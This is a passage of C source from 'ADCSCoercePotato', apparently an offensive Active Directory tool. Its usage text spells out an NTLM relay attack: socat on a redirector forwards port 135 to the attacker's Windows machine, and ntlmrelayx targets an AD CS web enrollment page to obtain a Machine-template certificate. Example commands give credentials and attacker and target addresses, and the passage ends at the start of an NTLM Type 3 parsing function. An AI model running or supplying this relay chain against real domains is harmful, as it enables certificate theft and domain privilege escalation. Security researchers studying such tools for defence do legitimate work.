| 85 | return -1; |
| 86 | } |
| 87 | void usage() |
| 88 | { |
| 89 | printf("ADCSCoercePotato\n- @decoder_it 2024\n\n", VERSION); |
| 90 | |
| 91 | printf("Mandatory args: \n" |
| 92 | "-u Domain Username\n" |
| 93 | "-p password\n" |
| 94 | "-d Domain Name\n" |
| 95 | "-m <host or IP> remote DCOM (ADCS) server address\n" |
| 96 | "-k <IP> redirector where socat and ntlmrelayx is running\n" |
| 97 | |
| 98 | ); |
| 99 | |
| 100 | printf("\n\n"); |
| 101 | printf("Optional args: \n" |
| 102 | "-n <port> HTTP port where redirector (ntlmrelayx) is listening, default:80\n" |
| 103 | "-l <port> local socket server port, default:9999\n" |
| 104 | "-c <clsid> default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}" |
| 105 | |
| 106 | |
| 107 | ); |
| 108 | printf("\n\n"); |
| 109 | printf("Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain\n"); |
| 110 | printf(" On the Linux box (assuming it has IP:192.168.1.88 and the Windows attacker machine is:192.168.1.89)\n"); |
| 111 | printf(" and ADCS web enrollment service is also running on:192.168.212.41\n"); |
| 112 | printf(" -> socat tcp -listen:135, reuseaddr, fork tcp:192.168.1.89:9999 &\n"); |
| 113 | printf(" -> ntlmrelayx.py -t http://192.168.212.41/certsrv/certrqus.asp --adcs --template Machine -smb2support\n\n"); |
| 114 | |
| 115 | } |
| 116 | void ParseUsernameFromType3(char* ntlmType3, int ntlmType3Len) { |
| 117 | short* domainLen, * userLen, * hostnameLen; |
| 118 | __int32* domainOffset, * userOffset, * hostnameOffset; |